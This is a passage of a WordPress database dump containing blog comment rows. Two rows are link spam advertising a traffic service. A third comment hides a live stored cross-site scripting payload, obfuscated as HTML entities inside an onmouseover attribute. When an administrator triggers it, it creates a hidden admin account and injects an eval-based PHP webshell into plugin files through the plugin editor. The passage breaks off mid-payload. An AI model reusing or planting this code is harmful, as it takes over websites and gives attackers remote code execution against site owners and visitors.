(144, 1, 'Lindsey', 'wcablahyt@tom.com', 'http://tgi.link/dcf2', '23.94.170.211', '2015-10-10 01:38:14', '2015-10-10 01:38:14', 'I was just looking at your Hello world! | Cross Training Center (Namur) website and see that your website has the potential to get a lot of visitors. I just want to tell you, In case you don\'t already know... There is a website service which already has more than 16 million users, and the majority of the users are interested in topics like yours. By getting your site on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can find out more about it here: http://tgi.link/dcf2 - Now, let me ask you... Do you need your website to be successful to maintain your business? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything. All the popular websites are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful site works... Here\'s to your success! Find out more here: http://tgi.link/dcf2', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(145, 1, 'Lindsey', 'irqyhwem@tom.com', 'http://digitalvikn.com.br/u/nk00', '23.95.196.194', '2015-10-19 01:25:42', '2015-10-19 01:25:42', 'I was just looking at your Hello world! | Cross Training Center (Namur) site and see that your site has the potential to become very popular. I just want to tell you, In case you didn\'t already know... There is a website network which already has more than 16 million users, and the majority of the users are looking for websites like yours. By getting your site on this network you have a chance to get your site more visitors than you can imagine. It is free to sign up and you can find out more about it here: http://ittsy.com/it/3x - Now, let me ask you... Do you need your website to be successful to maintain your way of life? Do you need targeted visitors who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your website? If your answer is YES, you can achieve these things only if you get your site on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the network before paying anything. All the popular websites are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That\'s how running a successful website works... Here\'s to your success! Read more here: http://ittsy.com/it/3x', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(146, 1, 'zhong', 'vemgujqg@gmail.com', 'http://www.facebook.com/wddllhaqnte', '36.235.41.64', '2015-11-09 11:55:44', '2015-11-09 11:55:44', 'Hi nice ar PbAn<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#032;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;